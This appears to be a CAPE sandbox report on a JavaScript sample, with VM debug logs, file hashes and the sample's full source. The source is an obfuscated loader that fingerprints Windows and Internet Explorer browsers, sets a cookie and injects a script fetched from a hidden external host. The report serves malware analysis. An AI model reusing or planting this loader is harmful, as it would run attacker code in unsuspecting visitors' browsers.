2025-12-08 08:31:20,906 [root] DEBUG: 556: OpenProcessHandler: Injection info created for process 396, handle 0x5f0: C:\Windows\System32\taskhost.exe
2025-12-08 08:31:23,477 [modules.auxiliary.human] INFO: Found button "ok", clicking it
2025-12-08 08:31:24,477 [root] DEBUG: 3016: NtTerminateProcess hook: Attempting to dump process 3016
2025-12-08 08:31:24,477 [root] DEBUG: 3016: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 08:31:24,493 [root] INFO: Process with pid 3016 has terminated
2025-12-08 08:31:41,508 [root] DEBUG: 556: OpenProcessHandler: Injection info created for process 3768, handle 0x5f0: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
2025-12-08 08:32:14,821 [root] DEBUG: 556: CreateProcessHandler: Injection info set for new process 224: C:\Windows\system32\DllHost.exe, ImageBase: 0x00A50000
2025-12-08 08:32:14,821 [root] INFO: Announced 32-bit process name: dllhost.exe pid: 224
2025-12-08 08:32:14,821 [lib.api.process] INFO: Monitor config for <Process 224 dllhost.exe>: C:\tmpxury4kjh\dll\224.ini
2025-12-08 08:32:14,836 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpxury4kjh\dll\yrjhZcK.dll, loader C:\tmpxury4kjh\bin\RVmCpJY.exe
2025-12-08 08:32:14,836 [root] DEBUG: Loader: Injecting process 224 (thread 1360) with C:\tmpxury4kjh\dll\yrjhZcK.dll.
2025-12-08 08:32:14,836 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 08:32:14,836 [root] DEBUG: Successfully injected DLL C:\tmpxury4kjh\dll\yrjhZcK.dll.
2025-12-08 08:32:14,852 [lib.api.process] INFO: Injected into 32-bit <Process 224 dllhost.exe>
2025-12-08 08:32:14,852 [root] INFO: Announced 32-bit process name: dllhost.exe pid: 224
2025-12-08 08:32:14,852 [lib.api.process] INFO: Monitor config for <Process 224 dllhost.exe>: C:\tmpxury4kjh\dll\224.ini
2025-12-08 08:32:14,852 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpxury4kjh\dll\yrjhZcK.dll, loader C:\tmpxury4kjh\bin\RVmCpJY.exe
2025-12-08 08:32:14,852 [root] DEBUG: Loader: Injecting process 224 (thread 1360) with C:\tmpxury4kjh\dll\yrjhZcK.dll.
2025-12-08 08:32:14,868 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 08:32:14,868 [root] DEBUG: Successfully injected DLL C:\tmpxury4kjh\dll\yrjhZcK.dll.
2025-12-08 08:32:14,868 [lib.api.process] INFO: Injected into 32-bit <Process 224 dllhost.exe>
2025-12-08 08:32:14,868 [root] DEBUG: 224: Python path set to 'C:\Python38'.
2025-12-08 08:32:14,868 [root] DEBUG: 224: Dropped file limit defaulting to 100.
2025-12-08 08:32:14,883 [root] INFO: Disabling sleep skipping.
2025-12-08 08:32:14,883 [root] DEBUG: 224: YaraInit: Compiled rules loaded from existing file C:\tmpxury4kjh\data\yara\capemon.yac
2025-12-08 08:32:14,883 [root] DEBUG: 224: YaraScan: Scanning 0x00A50000, size 0x4114
2025-12-08 08:32:14,883 [root] DEBUG: 224: Monitor initialised: 32-bit capemon loaded in process 224 at 0x6c9a0000, thread 1360, image base 0xa50000, stack from 0x176000-0x180000
2025-12-08 08:32:14,883 [root] DEBUG: 224: Commandline: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
2025-12-08 08:32:14,883 [root] DEBUG: 224: GetAddressByYara: ModuleBase 0x774E0000 FunctionName LdrpCallInitRoutine
2025-12-08 08:32:14,883 [root] DEBUG: 224: hook_api: LdrpCallInitRoutine export address 0x77538810 obtained via GetFunctionAddress
2025-12-08 08:32:14,883 [root] DEBUG: 224: hook_api: Warning - CreateRemoteThreadEx export address 0x764AF98F differs from GetProcAddress -> 0x754EBB18 (KERNELBASE.dll::0xbb18)
2025-12-08 08:32:14,899 [root] DEBUG: 224: hook_api: Warning - UpdateProcThreadAttribute export address 0x764B020F differs from GetProcAddress -> 0x754F43FB (KERNELBASE.dll::0x143fb)
2025-12-08 08:32:14,899 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 08:32:14,915 [root] DEBUG: 224: set_hooks: Unable to hook GetCommandLineA
2025-12-08 08:32:14,930 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 08:32:14,930 [root] DEBUG: 224: set_hooks: Unable to hook GetCommandLineW
2025-12-08 08:32:14,930 [root] DEBUG: 224: Hooked 611 out of 613 functions
2025-12-08 08:32:14,930 [root] DEBUG: 224: WoW64 not detected.
2025-12-08 08:32:14,930 [root] INFO: Loaded monitor into process with pid 224
2025-12-08 08:32:14,930 [root] DEBUG: 224: caller_dispatch: Added region at 0x00A50000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x00A5193E, thread 1360).
2025-12-08 08:32:14,930 [root] DEBUG: 224: YaraScan: Scanning 0x00A50000, size 0x4114
2025-12-08 08:32:14,946 [root] DEBUG: 224: ProcessImageBase: Main module image at 0x00A50000 unmodified (entropy change 0.000000e+00)
2025-12-08 08:32:14,961 [root] DEBUG: 224: DLL loaded at 0x753E0000: C:\Windows\system32\CRYPTBASE (0xc000 bytes).
2025-12-08 08:32:14,961 [root] DEBUG: 224: DLL loaded at 0x76100000: C:\Windows\system32\CLBCatQ (0x83000 bytes).
2025-12-08 08:32:14,961 [root] DEBUG: 224: DLL loaded at 0x75D80000: C:\Windows\system32\OLEAUT32 (0x8f000 bytes).
2025-12-08 08:32:14,961 [root] DEBUG: 224: DLL loaded at 0x74ED0000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2025-12-08 08:32:14,961 [root] DEBUG: 224: DLL loaded at 0x74C60000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2025-12-08 08:32:14,961 [root] DEBUG: 224: DLL loaded at 0x75450000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2025-12-08 08:32:14,977 [root] DEBUG: 224: DLL loaded at 0x74170000: C:\Windows\system32\uxtheme (0x40000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x75920000: C:\Windows\System32\wininet (0x1e4000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x75610000: C:\Windows\system32\api-ms-win-downlevel-user32-l1-1-0 (0x4000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x757E0000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0 (0x4000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x75620000: C:\Windows\system32\api-ms-win-downlevel-version-l1-1-0 (0x4000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x74960000: C:\Windows\system32\version (0x9000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x75600000: C:\Windows\system32\api-ms-win-downlevel-normaliz-l1-1-0 (0x3000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x77630000: C:\Windows\system32\normaliz (0x3000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x761B0000: C:\Windows\system32\iertutil (0x232000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x755C0000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l1-1-0 (0x5000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x757C0000: C:\Windows\system32\USERENV (0x17000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x754D0000: C:\Windows\system32\profapi (0xb000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x75790000: C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0 (0x4000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x75350000: C:\Windows\system32\Secur32 (0x8000 bytes).
2025-12-08 08:32:15,008 [root] DEBUG: 224: DLL loaded at 0x766D0000: C:\Windows\system32\SHELL32 (0xc4c000 bytes).
2025-12-08 08:32:15,008 [root] DEBUG: 224: DLL loaded at 0x72CD0000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0 (0x4000 bytes).
2025-12-08 08:32:15,008 [root] DEBUG: 224: DLL loaded at 0x72BF0000: C:\Windows\system32\winhttp (0x58000 bytes).
2025-12-08 08:32:15,008 [root] DEBUG: 224: DLL loaded at 0x72BA0000: C:\Windows\system32\webio (0x50000 bytes).
2025-12-08 08:32:15,008 [root] DEBUG: 224: DLL loaded at 0x74E90000: C:\Windows\system32\mswsock (0x3c000 bytes).
2025-12-08 08:32:15,024 [root] DEBUG: 224: DLL loaded at 0x74E80000: C:\Windows\System32\wship6 (0x6000 bytes).
2025-12-08 08:32:15,024 [root] DEBUG: 224: DLL loaded at 0x73640000: C:\Windows\system32\IPHLPAPI (0x1c000 bytes).
2025-12-08 08:32:15,024 [root] DEBUG: 224: DLL loaded at 0x736D0000: C:\Windows\system32\WINNSI (0x7000 bytes).
2025-12-08 08:32:19,743 [root] DEBUG: 556: OpenProcessHandler: Injection info created for process 2068, handle 0x5f8: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
2025-12-08 08:32:20,008 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
2025-12-08 08:32:20,008 [root] INFO: Process with pid 224 has terminated
2025-12-08 08:32:20,008 [root] DEBUG: 224: NtTerminateProcess hook: Attempting to dump process 224
2025-12-08 08:32:20,008 [root] DEBUG: 224: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 08:34:18,805 [root] INFO: Analysis timeout hit, terminating analysis
2025-12-08 08:34:18,805 [lib.api.process] INFO: Terminate event set for <Process 556 svchost.exe>
2025-12-08 08:34:18,805 [root] DEBUG: 556: Terminate Event: Attempting to dump process 556
2025-12-08 08:34:18,805 [root] DEBUG: 556: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 08:34:18,805 [root] DEBUG: 556: Terminate Event: Current region empty
2025-12-08 08:34:18,805 [lib.api.process] INFO: Termination confirmed for <Process 556 svchost.exe>
2025-12-08 08:34:18,805 [root] INFO: Terminate event set for process 556
2025-12-08 08:34:18,805 [root] DEBUG: 556: Terminate Event: CAPE shutdown complete for process 556
2025-12-08 08:34:18,805 [root] INFO: Created shutdown mutex
2025-12-08 08:34:19,805 [root] INFO: Shutting down package
2025-12-08 08:34:19,805 [root] INFO: Stopping auxiliary modules
2025-12-08 08:34:19,805 [root] INFO: Stopping auxiliary module: Browser
2025-12-08 08:34:19,805 [root] INFO: Stopping auxiliary module: Curtain
2025-12-08 08:34:19,821 [lib.common.results] INFO: Uploading file C:\curtain.log to curtain/1765154059.8212893.curtain.log; Size is 36; Max size: 100000000
2025-12-08 08:34:19,836 [root] INFO: Stopping auxiliary module: End_noisy_tasks
2025-12-08 08:34:19,836 [root] INFO: Stopping auxiliary module: Evtx
2025-12-08 08:34:19,836 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\Application.evtx to zip dump
2025-12-08 08:34:19,836 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\HardwareEvents.evtx to zip dump
2025-12-08 08:34:19,836 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\Internet Explorer.evtx to zip dump
2025-12-08 08:34:19,836 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\Key Management Service.evtx to zip dump
2025-12-08 08:34:19,836 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\Microsoft-Windows-Sysmon%4Operational.evtx to zip dump
2025-12-08 08:34:19,852 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\OAlerts.evtx to zip dump
2025-12-08 08:34:19,852 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\Security.evtx to zip dump
2025-12-08 08:34:19,852 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\Setup.evtx to zip dump
2025-12-08 08:34:19,852 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\System.evtx to zip dump
2025-12-08 08:34:19,852 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\Windows PowerShell.evtx to zip dump
2025-12-08 08:34:19,993 [modules.auxiliary.evtx] DEBUG: Uploading evtx.zip to host
2025-12-08 08:34:19,993 [lib.common.results] INFO: Uploading file evtx.zip to evtx/evtx.zip; Size is 323681; Max size: 100000000
2025-12-08 08:34:19,993 [root] INFO: Stopping auxiliary module: Human
2025-12-08 08:34:20,071 [root] INFO: Stopping auxiliary module: Pre_script
2025-12-08 08:34:20,071 [root] INFO: Stopping auxiliary module: Screenshots
2025-12-08 08:34:24,399 [root] INFO: Stopping auxiliary module: Usage
2025-12-08 08:34:25,493 [root] INFO: Stopping auxiliary module: During_script
2025-12-08 08:34:25,493 [root] INFO: Finishing auxiliary modules
2025-12-08 08:34:25,493 [root] INFO: Shutting down pipe server and dumping dropped files
2025-12-08 08:34:25,493 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat to files\42f9c76ccf7a86c64d1244263a0ff86751e86e025a5996c938bd49c2e24714a1; Size is 128; Max size: 100000000
2025-12-08 08:34:25,493 [root] WARNING: Folder at path "C:\izVIbM\debugger" does not exist, skipping
2025-12-08 08:34:25,493 [root] WARNING: Folder at path "C:\izVIbM\tlsdump" does not exist, skipping
2025-12-08 08:34:25,493 [root] INFO: Analysis completed
| Name | Label | Manager | Started On | Shutdown On | Route |
|---|---|---|---|---|---|
| win7-32bit-1 | win7-32bit-1 | KVM | 2025-12-08 16:32:32 | 2025-12-08 16:35:55 | inetsim |
| File Name |
testjs.js
|
|---|---|
| File Type | JavaScript source, ASCII text, with very long lines (1588), with no line terminators |
| File Size | 1588 bytes |
| MD5 | f3f4a0031083207815ea26bf7d96b25f |
| SHA1 | 8eae84b422288fb3798f13d07e8caa08a8b60cb9 |
| SHA256 | 0bc581a48215eb92ecc15b30954ee4f1c2d9be15134e72b5f3aebe192eae3cb4 [VT] [MWDB] [Bazaar] |
| SHA3-384 | 7da3b7677de10374837ca9b7c60452ccdcb70b974ed8f62507236595f9dfa75e9c93090a078a57176be875f403ca76f7 |
| CRC32 | 7FD7BCF1 |
| TLSH | T1A131629B7000D8E183664197F73F110D29BA9D54E0EE8519CD49904E3CB8E4D8129ECF |
| Ssdeep | 48:ncrKDElo1rmeYG9Gp090nnaBOR+N6kzkem:uKYlQ+aTNhzXm |
| File BinGraph Vba2Graph Text |
(function(){var v=50;var e=0;function b(){e++;if(e>v)return false;if(!document.body)setTimeout(b,500);else(function(){function t(s){return(s+'').replace(/[a-z]/gi,function(s){return String.fromCharCode(s.charCodeAt(0)+(s.toLowerCase()<'n'?13:-13));});}var i=[' ;1=',' GA ','gcv','p.rk',')q\\/','RVFZ','inw/','avJ(','=fre',')]+',']9-3','[.6 ','))]7','vepf','(1.5','gar','gkrg','|]9-','GA f','u',']3-0','0[1|','revS','a//:','fjbq','gc','c','9-0[','R )*','qveG','epfn','.(01','cggu',')*.(','cn-f','vJ(|','.21/','kbsr','vsgr','GA'];for(var z=0;z<i.length;z++){var s=t(i[z]+'');i[z]=s.split('').reverse().join('');}function je(v,u){var w=false;var d=false;for(var k=0;k<v.length;k++){var p=new RegExp(v[k][0],v[k][1]);if(v[k][2]){w=true;if(p.test(u)){d=true;}}else{if(p.test(u)){return false;}}}if(w&&!d){return false;}return true;}var ud=navigator.userAgent;if(je([[i[5],'i',1],[i[29]+i[15],'i',1],[i[7]+i[24]+i[1]+i[14]+t('.*) ')+i[22]+t('sbk\\')+t('/\\q)')+i[35]+t('aqbj')+i[18]+i[11]+i[20]+i[33]+t(' Sve')+i[37]+t('\\/([')+i[10]+t('.[0|')+t('5|6]')+i[21]+i[17]+t('2[0-')+i[12],'i',1],[i[7]+i[24]+i[1]+i[31]+i[28]+t('qtr\\')+i[36]+i[27]+i[9],'i',1]],ud)&&je([[t('Jvaq')+t('bjf ')+i[39],'i',1]],ud)){(function(){var g=t('k-gq')+i[34]+i[26];var j=document.cookie.match(new RegExp("(?:^|; )"+g+"=([^;]*)"));if(!j){var s=document.createElement(i[13]+i[25]);s.type=i[16]+i[6]+i[30]+i[2];s.src=i[32]+i[23]+i[38]+i[3]+i[19];var m=document.documentElement;m.insertBefore(s,m.lastChild);var d=new Date();d.setTime(d.getTime()+259200000);document.cookie=g+i[0]+t('rkcv')+i[8]+d;}})();}})();}b();})();
| Discovery | Command and Control | Defense Evasion | Privilege Escalation |
|
|
|
|---|
No hosts contacted.
No domains contacted.
No hosts contacted.
No TCP connections recorded.
No UDP connections recorded.
No domains contacted.
No HTTP(s) requests performed.
No SMTP traffic performed.
No IRC requests performed.
No ICMP traffic performed.
No CIF Results
No Suricata Alerts
No Suricata TLS
No Suricata HTTP